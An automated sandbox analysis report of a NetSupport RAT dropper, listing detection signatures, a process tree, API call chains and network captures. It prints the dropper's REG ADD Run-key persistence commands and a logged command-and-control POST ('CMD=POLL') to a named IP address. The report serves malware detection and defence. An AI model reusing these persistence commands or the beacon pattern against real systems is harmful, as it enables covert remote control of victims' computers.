Windows Analysis Report
d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Overview

General Information

Sample name: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Analysis ID: 1580475
MD5: 47cfce938a71540a2039aebd5abe0783
SHA1: 641d20b31f5b2aba11746d1e533cbe4d4ee9c6ed
SHA256: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d582b6d0b6f188306954
Tags: exe, NetSupport, user-abuse_ch

Detection

NetSupport RAT
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Uses cmd line tools excessively to alter registry or file data
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe" MD5: 47CFCE938A71540A2039AEBD5ABE0783)
    • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7656 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7676 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • bild.exe (PID: 7692 cmdline: C:\Users\Public\Netstat\bild.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7904 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 8120 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7176 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
Dropped files:
Source | Rule | Description | Author | Strings
C:\Users\Public\Netstat\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Netstat\bild.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Netstat\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Netstat\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Netstat\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(2 more entries not shown)

Memory dumps:
Source | Rule | Description | Author | Strings
00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(28 more entries not shown)

Unpacked PE files:
Source | Rule | Description | Author | Strings
6.2.bild.exe.4b0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
11.2.bild.exe.4b0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
11.0.bild.exe.4b0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
5.2.bild.exe.6f980000.6.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
6.2.bild.exe.6f980000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(30 more entries not shown)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Netstat\bild.exe, CommandLine: C:\Users\Public\Netstat\bild.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\bild.exe, NewProcessName: C:\Users\Public\Netstat\bild.exe, OriginalFileName: C:\Users\Public\Netstat\bild.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\bild.exe, ProcessId: 7692, ProcessName: bild.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7656, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 45.76.253.210, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\bild.exe, Initiated: true, ProcessId: 7692, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7656, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", ProcessId: 7656, ProcessName: reg.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", ProcessId: 7656, ProcessName: reg.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7676, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Netstat

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T17:37:03.193758+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 45.76.253.210 | 443 | TCP

AV Detection

Source: C:\Users\Public\Netstat\bild.exe | ReversingLabs: Detection: 28%
Source: C:\Users\Public\Netstat\remcmdstub.exe | ReversingLabs: Detection: 13%
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.7% probability
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,5_2_110AD570
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_110AD570
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File opened: C:\Users\Public\Netstat\msvcr100.dll
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000005.00000002.4163625872.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000006.00000002.1828393967.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000A.00000002.1909924839.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000B.00000002.1989498636.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000005.00000002.4163937013.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000006.00000002.1828654414.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000A.00000002.1910320123.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000B.00000002.1989707601.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1712834967.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000000.1825297800.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000002.1826623935.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000000.1906094191.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000B.00000000.1987565229.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000B.00000002.1988599605.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000005.00000002.4163812487.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000006.00000002.1828564621.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000A.00000002.1910207199.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000B.00000002.1989634737.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D7A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D7A273
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D8A537
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11065890
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106A0A0
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111266E0
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110AFD0

Networking

Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 45.76.253.210:443
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.26.1.231
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS
Source: unknown | TCP traffic detected without corresponding DNS query: 45.76.253.210
Source: unknown | TCP traffic detected without corresponding DNS query: 45.76.253.210
Source: unknown | TCP traffic detected without corresponding DNS query: 45.76.253.210
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown | HTTP traffic detected: POST http://45.76.253.210/fakeurl.htm HTTP/1.1 | User-Agent: NetSupport Manager/1.3 | Content-Type: application/x-www-form-urlencoded | Content-Length: 22 | Host: 45.76.253.210 | Connection: Keep-Alive | Data Ascii: CMD=POLL INFO=1 ACK=1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Dec 2024 16:37:05 GMT | Content-Type: text/html; charset=us-ascii | Transfer-Encoding: chunked | Connection: keep-alive | CF-Ray: 8f72039419fd425f-EWR | CF-Cache-Status: DYNAMIC | cf-apo-via: origin,host | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lW7SVSTeGp6OMPZWlwr0EkdKqCkxO1QY2Xx3tzIwjQw9wj7tLvCi2nECvSnMfUIfdQit%2BIjKqFjaT%2BrObcB9Ya5UFQLQZ5UrOriDWvmNuxghySnFhBKpzWUwyWyGKBbDC7Go%2B1Qt6tiUe4aX"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: [hex dump omitted] | Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Dec 2024 16:37:06 GMT | Content-Type: text/html; charset=us-ascii | Transfer-Encoding: chunked | Connection: keep-alive | CF-Ray: 8f72039d1ee742a0-EWR | CF-Cache-Status: DYNAMIC | cf-apo-via: origin,host | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPdTQEZmPl0lBKR8KjJx9PbAboAcYEK7D0bbCWAIEhlIB2fELg1PzGJcs9DUzwzswUJFVFDlO6xK%2B1ubSbS%2BNIjFDfBktvslhfF6N0RWnlYC80AqdmHSVPfal9CXdU5wPQqn7KgQ63D2hQAs"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: [hex dump omitted] | Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Dec 2024 16:37:08 GMT | Content-Type: text/html; charset=us-ascii | Transfer-Encoding: chunked | Connection: keep-alive | CF-Ray: 8f7203a5e8bd2363-EWR | CF-Cache-Status: DYNAMIC | cf-apo-via: origin,host | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDN2muabuDV1YmuvJbYCyAYC9CLGNBg8bk%2BbqBXz3O2MIc1VvRFdsqJwbq0YkROI6bTaCOg9HNkgix49mKAnVimMvoH2wsMzl%2FQqSiPrfHtdCuW91y1E0zHliTGDWMPvBl1ijm4wLylWZyjI"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1816&rtt_var=908&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: [hex dump omitted] | Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: bild.exe, bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | String found in binary or memory: http://%s/fakeurl.htm
                                Source: bild.exe, bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | String found in binary or memory: http://%s/testpage.htm
                                Source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | String found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: bild.exe, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://127.0.0.1
